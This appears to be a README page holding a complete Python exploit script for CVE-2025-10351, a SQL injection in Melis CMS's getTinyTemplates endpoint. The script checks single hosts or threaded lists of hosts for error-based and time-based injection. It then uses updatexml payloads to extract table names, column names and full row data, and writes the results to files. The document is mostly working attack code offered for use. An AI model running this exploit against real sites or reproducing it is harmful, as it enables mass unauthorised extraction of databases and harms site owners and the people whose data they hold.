README.md
Rendering markdown...
#!/usr/bin/env python3
#===========================================================================================#
# _______ ________ ___ ___ ___ _____ __ ___ ____ _____ __ #
# / ____\ \ / / ____| |__ \ / _ \__ \| ____| /_ |/ _ \___ \| ____/_ | #
# | | \ \ / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__ | | #
# | | \ \/ / | __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ | | #
# | |____ \ / | |____ / /_| |_| / /_ ___) | | | |_| |__) |___) || | #
# \_____| \/ |______| |____|\___/____|____/ |_|\___/____/|____/ |_| #
# #
# #
# Made with love for the hacking community <3 Manuel Iván San Martín Castillo #
#===========================================================================================#
import requests
import argparse
import html
import time
import urllib3
import concurrent.futures
from colorama import Fore, Style, init
from prettytable import PrettyTable
from urllib.parse import urlparse, urlsplit, parse_qs, urlunsplit
from bs4 import BeautifulSoup
# Disable SSL warnings for self-signed certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialize color output
init(autoreset=True)
# Toggle debug details for requests/responses in make_petition
DEBUG_REQ = False
def remove_html_tags(text):
"""Remove all HTML tags from a given string using BeautifulSoup."""
return BeautifulSoup(text, "html.parser").get_text()
def is_time_based_sqli(session, url, payload_true, payload_false, sleep_time, threshold=0.9):
"""Check for time-based SQL injection by measuring response time differences using a session."""
try:
false_start = time.time()
session.get(url + requests.utils.requote_uri(payload_false), timeout=sleep_time + 5)
false_duration = time.time() - false_start
true_start = time.time()
session.get(url + requests.utils.requote_uri(payload_true), timeout=sleep_time + 5)
true_duration = time.time() - true_start
delay = true_duration - false_duration
return delay >= (sleep_time * threshold)
except requests.exceptions.Timeout:
return True
except Exception:
return False
def check_endpoint(host, port, endpoint, cookie, proxy_str=None, disable_verify=False):
"""
Main logic to check if a given endpoint is vulnerable to SQLi.
Uses a requests.Session so cookie/headers persist across exploitation requests.
proxy_str and disable_verify are passed so recursion keeps same settings.
"""
base_url = f"{host}:{port}"
endpoint_with_quote = endpoint.replace("=", "='")
url_with_quote = f"{base_url}/{endpoint_with_quote}"
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}
cookies = {"PHPSESSID": cookie} if cookie else {}
# Use a session to keep cookies and headers consistent across all requests
session = requests.Session()
session.headers.update(headers)
if cookies:
session.cookies.update(cookies)
# Apply proxy and TLS behavior (explicit, no env)
if proxy_str:
session.proxies = {"http": proxy_str, "https": proxy_str}
session.trust_env = False
# session.verify respects disable_verify flag
session.verify = False if disable_verify else True
# initial check - follow redirects so we can spot login pages
response = session.get(url_with_quote, allow_redirects=True, timeout=5)
# Authentication required detection:
# if there was a redirect to login, response.history will be non-empty or response.url will differ
if not args.url_list and (response.history or (response.url and response.url != url_with_quote)):
print(f"{base_url} {Fore.YELLOW}[AUTH REQUIRED]{Style.RESET_ALL}")
new_cookie = ask_for_cookies()
if new_cookie and len(new_cookie) >= 8:
return check_endpoint(host, port, endpoint, new_cookie, proxy_str, disable_verify)
elif new_cookie:
print(f"{base_url} {Fore.BLUE}[INVALID COOKIE]{Style.RESET_ALL}")
return
# Error-based SQLi detection (look for MySQL error or xpath syntax error triggered by updatexml)
if "You have an error in your SQL syntax" in response.text or "xpath" in response.text.lower():
print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Error-Based SQLi")
if args.all_tables or args.table:
ask_to_exploit(f"{base_url}/{endpoint}", session)
else:
base = f"{base_url}/"
# True delay payload (sleep happens)
payload_true = endpoint.replace(
"=",
f"=1 AND (SELECT 1 FROM (SELECT(SLEEP({int(args.sleep)})))test)"
)
# False payload (no delay)
payload_false = endpoint.replace(
"=",
"=1 AND (SELECT 1 FROM (SELECT(1))test)"
)
if is_time_based_sqli(session, base, payload_true, payload_false, args.sleep):
print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Time-Based SQLi")
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} WARNING: Time-Based exploitation is not supported.")
else:
print(f"{base_url} {Fore.GREEN}[NOT VULNERABLE]{Style.RESET_ALL}")
except requests.exceptions.SSLError:
print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} SSL Error")
except requests.exceptions.ConnectionError:
print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} Connection Error")
except Exception as e:
print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} General Error: {e}")
def process_url_list(file_path, endpoint, cookie, proxy_str=None, disable_verify=False):
"""Read URLs/hosts from a file and test each one individually (robust input + concurrency)."""
try:
seen = set()
targets_all = []
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
line = line.strip()
# Skip empties & comments
if not line or line.startswith("#"):
continue
targets = []
# Case 1: full URL with scheme
if "://" in line:
parsed = urlparse(line)
scheme = parsed.scheme.lower() if parsed.scheme else "http"
host = parsed.hostname
port = parsed.port if parsed.port else (443 if scheme == "https" else 80)
if not host:
continue
full_host = f"{scheme}://{host}"
targets.append((full_host, str(port)))
else:
# Case 2/3: host, ip, host:port, ip:port (no scheme)
parsed = urlparse(f"//{line}")
host = parsed.hostname
port = parsed.port
if not host:
continue
if port:
tls_ports = {443, 8443, 9443, 10443}
scheme = "https" if port in tls_ports else "http"
targets.append((f"{scheme}://{host}", str(port)))
else:
targets.append((f"https://{host}", "443"))
targets.append((f"http://{host}", "80"))
# Dedup + collect
for full_host, port in targets:
key = (full_host, port)
if key in seen:
continue
seen.add(key)
targets_all.append((full_host, port))
if not targets_all:
print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] URL list is empty or no valid targets found.")
return
# Concurrency (threads): simple and effective for I/O (requests)
max_workers = 20 # sube/baja si quieres; 20 suele ir fino sin reventar nada
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as ex:
futures = [
ex.submit(check_endpoint, full_host, port, endpoint, cookie, proxy_str, disable_verify)
for (full_host, port) in targets_all
]
# Consume results to surface exceptions (if any)
for fut in concurrent.futures.as_completed(futures):
try:
fut.result()
except Exception as e:
print(f"[{Fore.YELLOW}X{Style.RESET_ALL}] Worker error: {e}")
except Exception as e:
print(f"[{Fore.RED}ERROR{Style.RESET_ALL}] Failed to process URL list: {e}")
def ask_to_exploit(url, session):
"""Ask user if they want to exploit an identified SQLi vulnerability. Pass session so exploitation uses same cookies."""
choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Do you want to attempt exploitation? (y/n): ").strip().lower()
if choice in ('y', 'yes'):
exploit_error_based(url, args.sleep, session)
else:
print(f"[{Fore.BLUE}X{Style.RESET_ALL}] Exploitation aborted.")
def ask_for_cookies():
"""Ask the user to input a PHPSESSID cookie value for rechecking."""
choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Recheck with cookies? (y/n): ").strip().lower()
if choice in ('y', 'yes'):
return input(f"[{Fore.YELLOW}-{Style.RESET_ALL}] Enter PHPSESSID cookie: ").strip()
return None
def make_petition(session, url, payload_template, sleep_time, output_file, data_type):
"""
Robust petition with improved extraction reliability.
Guarantees that even single results like '~changelog~' are printed.
"""
if output_file and output_file.lower() != 'null':
open(output_file, 'w').close()
extracted_rows = []
no_data_counter = 0
parsed = urlsplit(url)
param_name = None
base_for_request = url
if parsed.query:
qs = parse_qs(parsed.query)
if qs:
param_name = list(qs.keys())[0]
base_for_request = urlunsplit((parsed.scheme, parsed.netloc, parsed.path, '', ''))
else:
if '=' in url and url.rstrip().endswith('='):
idx = url.rfind('=')
last_part = url[:idx].split('/')[-1]
param_name = last_part if last_part else 'id'
base_for_request = url[:idx+1].rstrip('=')
use_params = bool(param_name)
for offset in range(0, 100):
CHAIN = ""
ITERATOR = 1
ended = False
data_fragment = ""
while True:
payload = payload_template.format(ITERATOR=ITERATOR, OFFSET=offset)
try:
if use_params:
params = {param_name: payload}
if DEBUG_REQ:
print(f"[DEBUG] GET {base_for_request} params={params}")
response = session.get(base_for_request, params=params, allow_redirects=False, timeout=3)
else:
exploit_url = url + requests.utils.requote_uri(payload)
if DEBUG_REQ:
print(f"[DEBUG] GET {exploit_url}")
response = session.get(exploit_url, allow_redirects=True, timeout=3)
if DEBUG_REQ:
print(f"[DEBUG] status={response.status_code} url={response.url}")
snippet = response.text[:800].replace("\n", "\\n")
print(f"[DEBUG] resp snippet: {snippet}")
response_text = html.unescape(remove_html_tags(response.text))
lines = response_text.splitlines()
found_data = False
for line in lines:
if "xpath" in line.lower():
# Detect data between ~ ~
if "~" in line:
extracted = line.split("~")
if len(extracted) > 1:
data_fragment = extracted[1].split("'")[0] if "'" in extracted[1] else extracted[1]
elif ":" in line:
data_fragment = line.split(":")[-1].strip()
else:
data_fragment = line.strip()
if data_fragment:
found_data = True
CHAIN += data_fragment
if DEBUG_REQ:
print(f"[DEBUG] extracted fragment: '{data_fragment}'")
if found_data:
no_data_counter = 0
else:
no_data_counter += 1
if no_data_counter >= 5:
break
ITERATOR += 31
time.sleep(sleep_time)
except requests.RequestException as e:
if DEBUG_REQ:
print(f"[DEBUG] request exception: {e}")
break
# 🔧 NEW: ensure we don’t lose single results
if not CHAIN and data_fragment:
CHAIN = data_fragment
if CHAIN:
extracted_rows.append(CHAIN)
print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Extracted {data_type}: {Fore.BLUE}{CHAIN}{Style.RESET_ALL}")
if output_file and output_file.lower() != 'null':
with open(output_file, 'a') as f:
f.write(CHAIN + '\n')
print(f"\n[{Fore.RED}X{Style.RESET_ALL}] Finished extraction process.\n")
return extracted_rows
def display_table(data_list, columns, output_file):
"""Display extracted data in a nicely formatted table."""
print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Table with data")
table = PrettyTable()
table.field_names = columns
for index, row in enumerate(data_list):
row_data = row.split("||")
if len(row_data) == len(columns):
table.add_row(row_data)
if index < len(data_list) - 1:
table.add_divider()
print(table)
if output_file and output_file.lower() != 'null':
with open(output_file, 'a') as f:
f.write(str(table) + '\n')
def extract_tables(session, url, sleep_time, tables_filename):
"""Extract all table names in the current database."""
payload_template = (
"1 OR updatexml(null, concat(0x7e, "
"(SELECT substring(table_name, {ITERATOR}, 32) "
"FROM information_schema.tables WHERE table_schema=database() "
"LIMIT 1 OFFSET {OFFSET}), 0x7e), null)"
)
make_petition(session, url, payload_template, sleep_time, tables_filename, 'table')
def extract_columns(session, url, sleep_time, table_name):
"""Extract all column names from a specific table."""
print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting columns from table: {table_name}")
payload_template = (
f"1 OR updatexml(null, concat(0x7e, "
f"(SELECT substring(column_name, {{ITERATOR}}, 32) "
f"FROM information_schema.columns WHERE table_name='{table_name}' "
f"LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
)
return make_petition(session, url, payload_template, sleep_time, 'null', 'column')
def extract_data_from_columns(session, url, sleep_time, table_name, columns):
"""Extract data from specified columns in a table."""
parsed_url = urlparse(url)
base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
column_list = columns.split(',')
columns_combined = ", 0x7c7c, ".join(column_list)
payload_template = (
f"1 OR updatexml(null, concat(0x7e, "
f"(SELECT substring(concat({columns_combined}), {{ITERATOR}}, 32) "
f"FROM {table_name} LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
)
print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting data from {base_url}")
extracted_data = make_petition(session, url, payload_template, sleep_time, f"{table_name}_data.txt", 'data')
if extracted_data:
display_table(extracted_data, column_list, f"{table_name}_data.txt")
def exploit_error_based(url, sleep_time, session):
"""Main handler for exploiting via error-based SQL injection. Uses session passed from check_endpoint."""
print(f"{Fore.BLUE}i{Style.RESET_ALL} Attempting Error-Based SQL Injection on {url}")
print(f"{Fore.YELLOW}!{Style.RESET_ALL} WARNING: Large data may not extract properly")
if args.all_tables:
extract_tables(session, url, sleep_time, "tables_extracted.txt")
elif args.table:
if args.all_columns:
columns = extract_columns(session, url, sleep_time, args.table)
if columns:
extract_data_from_columns(session, url, sleep_time, args.table, ",".join(columns))
elif args.columns:
extract_data_from_columns(session, url, sleep_time, args.table, args.columns)
else:
extract_columns(session, url, sleep_time, args.table)
if __name__ == "__main__":
usage_message = "CVE-2025-10351.py -u <URL> -p <PORT> | -l <URL_LIST> [-s <SLEEP_TIME>] [-at] [-t <TABLE>] [-ac]"
parser = argparse.ArgumentParser(usage=usage_message, add_help=False, description="Script to check and exploit CVE-2025-10351.")
parser.add_argument("-u", "--url", help="Target URL (e.g. https://www.example.com)")
parser.add_argument("-p", "--port", help="Port (e.g. 80, used only with --url)")
parser.add_argument("-l", "--url-list", help="File with URLs to check (one per line)")
parser.add_argument("-s", "--sleep", type=float, default=1.0, help="Sleep time (default: 1s)")
parser.add_argument("-at", "--all-tables", action='store_true', help="Extract all tables.")
parser.add_argument("-t", "--table", help="Specify a table name to extract columns.")
parser.add_argument("-ac", "--all-columns", action='store_true', help="Extract all column data (requires -t).")
parser.add_argument("-c", "--columns", help="Specify columns to extract (comma-separated).")
parser.add_argument("--proxy", help="Proxy URL (no env). Example: http://127.0.0.1:8080")
parser.add_argument("--insecure", action="store_true", help="Disable TLS verification (useful for intercepting HTTPS with Burp)")
parser.add_argument("--cookie", help="PHPSESSID cookie (optional). Example: abc123")
parser.add_argument("--debug", action="store_true", help="Enable verbose request/response debug for extraction")
parser.add_argument("-h", "--help", action='help', default=argparse.SUPPRESS, help="Show help message.")
args = parser.parse_args()
# enable debug if requested
if args.debug:
DEBUG_REQ = True
endpoint = "melis/MelisCms/PageEdition/getTinyTemplates?idPage="
# Accept optional cookie via CLI
cookie_arg = args.cookie or ""
if args.url and args.port:
check_endpoint(args.url, args.port, endpoint, cookie_arg, args.proxy, args.insecure)
elif args.url_list:
process_url_list(args.url_list, endpoint, cookie_arg, args.proxy, args.insecure)
else:
parser.print_help()